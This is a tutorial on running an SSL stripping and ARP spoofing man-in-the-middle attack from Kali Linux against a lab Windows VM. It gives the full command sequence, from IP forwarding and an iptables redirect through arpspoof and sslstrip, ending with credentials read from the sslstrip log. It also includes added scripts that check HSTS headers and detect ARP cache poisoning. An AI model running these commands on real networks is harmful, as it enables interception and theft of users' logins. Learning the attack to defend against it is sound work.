
SSL Stripping and ARP Spoofing in Kali Linux


SSL (Secure Sockets Layer) stripping is an attack that a cyber attacker or intruder on a network can perform to change an HTTPS (Hypertext Transfer Protocol Secure) connection into an HTTP (Hypertext Transfer Protocol) connection. ARP (Address Resolution Protocol) spoofing helps to set up an SSL stripping attack against any victim connected to the same network as the attacker, such as the same public Wi-Fi.

Structure Diagram:

For a better understanding, see the diagram below:

[Figure: SSL Stripping]

There are mainly 4 steps in this type of attack:

  1. The victim sends a request to the server over HTTPS, but because the attacker has spoofed the network with arpspoof, the HTTPS request passes through the attacker's machine.
  2. After hijacking the HTTPS request, the attacker sends the same HTTPS request to the server, because many modern servers respond only in HTTPS mode.
  3. When the server responds in HTTPS-encrypted form, the attacker changes the response from HTTPS, which is a secure connection, to HTTP.
  4. The attacker answers the victim's request over HTTP and so works as a man-in-the-middle.

These types of attacks can be carried out on public networks. A malicious user can also set up their own Wi-Fi network and, when anyone connects to it, perform credential theft attacks on bank accounts or any other malicious activity.
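The downgrade in steps 3 and 4 only works while the victim's browser is willing to speak plain HTTP to the site; a site that sends a Strict-Transport-Security (HSTS) header tells returning browsers to refuse it. The check below is an added example, not part of the original article: it reads HTTPS response headers and reports whether that policy is present and long-lived. The sample headers and the one-year threshold are assumptions of this example.

```sh
#!/bin/sh
# Added example (not from the article): judge a site's HSTS policy from its
# HTTPS response headers. MIN_AGE is this example's own threshold (one year).
MIN_AGE=31536000

# Constructed header sets standing in for `curl -sI https://<site>` output.
sample_pinned() {
  printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n'
  printf 'Strict-Transport-Security: max-age=63072000; includeSubDomains\r\n\r\n'
}
sample_short() {
  printf 'HTTP/1.1 200 OK\r\nstrict-transport-security: max-age=300\r\n\r\n'
}
sample_none() {
  printf 'HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n'
}

# hsts_verdict  (response headers on stdin)
# exit 0: browser will refuse plain HTTP on later visits; 1: downgrade possible
hsts_verdict() {
  awk -v min="$MIN_AGE" '
    !found && tolower($0) ~ /^strict-transport-security:/ {
      found = 1                              # only the first header counts
      v = tolower($0)
      sub(/^[^:]*:/, "", v)                  # drop the header name
      gsub(/[ \t\r"]/, "", v)                # drop whitespace, CR and quotes
      n = split(v, d, ";")
      for (i = 1; i <= n; i++) {
        if (d[i] ~ /^max-age=[0-9]+$/) { age = substr(d[i], 9) + 0; hasage = 1 }
        if (d[i] == "includesubdomains") subs = 1
      }
    }
    END {
      if (!hasage)   { print "exposed: no usable HSTS policy"; exit 1 }
      if (age == 0)  { print "exposed: max-age=0 removes the policy"; exit 1 }
      if (age < min) { print "weak: max-age " age " is below " min; exit 1 }
      tail = subs ? ", subdomains included" : ""
      print "pinned: max-age " age tail
    }'
}

# Demo on the constructed samples.
sample_pinned | hsts_verdict
sample_short | hsts_verdict || true
sample_none | hsts_verdict || true
```

HSTS takes effect only after the browser has seen the header once over HTTPS (or the domain is on a preload list), so a first visit made over plain HTTP can still be downgraded.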

SSL Stripping and ARP Spoofing Usage

The following are the steps for performing SSL Stripping and ARP Spoofing in Kali Linux:

Step 1: Open the Kali Linux terminal in root mode.

Step 2: Type the following command in the terminal and hit enter to install sslstrip:

$ apt install sslstrip

sslstrip is now installed on our Kali Linux system.

Step 3: Type the following command in the terminal and hit enter to install dsniff:

$ apt install dsniff

dsniff is now installed on our Kali Linux system.

Step 4: Type the following command in the terminal and hit enter to find the name of the network interface:

$ ifconfig

This will show which interface we are using. In our case, the interface is eth0 and the IP is 10.0.2.4.

Step 5: Execute the following command in the terminal and hit enter to enable IP forwarding:

$ echo '1' > /proc/sys/net/ipv4/ip_forward

This makes our Kali machine act as a router on the network.

Step 6: Type the following command in the terminal and hit enter to configure iptables:

$ iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

This adds a NAT rule so that TCP traffic with destination port 80 is redirected to port 8080.

Step 7: Type the following command in the terminal and hit enter to find the gateway IP of our router:

$ route -n

This will show our gateway IP address. In our case, the gateway IP is 10.0.2.1.

Step 8: Type the following command in the terminal and hit enter to find targets in the network:

$ nmap -sS -O <gateway ip>/24

In our case, the gateway IP is 10.0.2.1, so we will use this gateway IP for our task:

$ nmap -sS -O 10.0.2.1/24

This will scan and list all IP addresses on the router's network, and based on the scan result we can identify our target. In our case, we want to attack the second VM, which runs Windows, so we will open the Windows VM.

Step 9: Open the command prompt on the Windows VM, type ipconfig and hit enter:

$ ipconfig

This will show the Windows VM's IP as well as the gateway. Here we can also verify our gateway IP address.

In our case, the Windows VM's IP (the target IP) is 10.0.2.5.

Step 10: Now open a new terminal with root access in Kali Linux, type the following command and hit enter.

This will start ARP spoofing against our target machine.

$ arpspoof -i <interface> -t <target IP> -r <gateway IP>

In our case, that is:

$ arpspoof -i eth0 -t 10.0.2.5 -r 10.0.2.1

Now the ARP spoofing is started.

Step 11: Without closing the arpspoof terminal, open a new terminal with root access, type the following command and hit enter:

$ sslstrip -l 8080

This will start SSL stripping against the targeted Windows VM.

Step 12: Now open the browser on the targeted Windows machine and enter any web page address. In our case we type https://instagram.com; it goes to the Instagram login page, where we enter random data and click the login button.

This data will be captured in the sslstrip.log file on our Kali Linux system.

Step 13: Now open up a new terminal in Kali Linux with root access and type the following command in the terminal and hit enter.

$ cat sslstrip.log

This will show the captured data. In this way, we can perform SSL Stripping and ARP Spoofing in our Kali Linux system.
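From the defending side, the poisoning started in Step 10 is visible in the target's own ARP cache: the gateway IP (10.0.2.1 here) and the spoofing host (10.0.2.4 here) resolve to the same MAC address. The following check is an added example, not part of the original article; it assumes a Linux host in the target's position and `ip neigh show` output, and the MAC addresses in the samples are constructed.

```sh
#!/bin/sh
# Added example (not from the article): detect a poisoned gateway entry in the
# neighbour (ARP) cache. Input format is Linux `ip neigh show`:
#   <ip> dev <iface> lladdr <mac> <STATE>

# Constructed sample: cache on the target (10.0.2.5) during the spoof. The
# gateway 10.0.2.1 and the spoofing host 10.0.2.4 carry the same made-up MAC.
sample_poisoned() {
cat <<'EOF'
10.0.2.1 dev eth0 lladdr 08:00:27:AA:BB:04 REACHABLE
10.0.2.4 dev eth0 lladdr 08:00:27:aa:bb:04 STALE
10.0.2.3 dev eth0 lladdr 08:00:27:aa:bb:03 STALE
10.0.2.7 dev eth0 FAILED
EOF
}

# Constructed sample: the same cache with an unpoisoned gateway entry.
sample_clean() {
cat <<'EOF'
10.0.2.1 dev eth0 lladdr 52:54:00:12:35:00 REACHABLE
10.0.2.4 dev eth0 lladdr 08:00:27:aa:bb:04 STALE
EOF
}

# check_gateway GATEWAY_IP  (neighbour table on stdin)
# exit 0: gateway MAC is unique; 1: shared with another IP; 2: gateway not cached
check_gateway() {
  awk -v gw="$1" '
    {
      mac = ""
      for (i = 1; i < NF; i++) if ($i == "lladdr") mac = tolower($(i + 1))
      if (mac == "") next               # FAILED/INCOMPLETE entries have no MAC
      if ($1 == gw) gwmac = mac
      else if (mac in owners) owners[mac] = owners[mac] "," $1
      else owners[mac] = $1
    }
    END {
      if (gwmac == "") { print "unknown: " gw " not in cache"; exit 2 }
      if (gwmac in owners) {
        print "ALERT: " gw " shares " gwmac " with " owners[gwmac]; exit 1
      }
      print "ok: " gw " is at " gwmac
    }'
}

# Demo on the constructed data; on a live host: ip neigh show | check_gateway 10.0.2.1
sample_poisoned | check_gateway 10.0.2.1 || true
sample_clean | check_gateway 10.0.2.1
```

A shared MAC can also be legitimate (for example, a router that holds several addresses on the segment), so an alert is a prompt to compare against the gateway's known hardware address.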

Last Updated : 02 Jan, 2023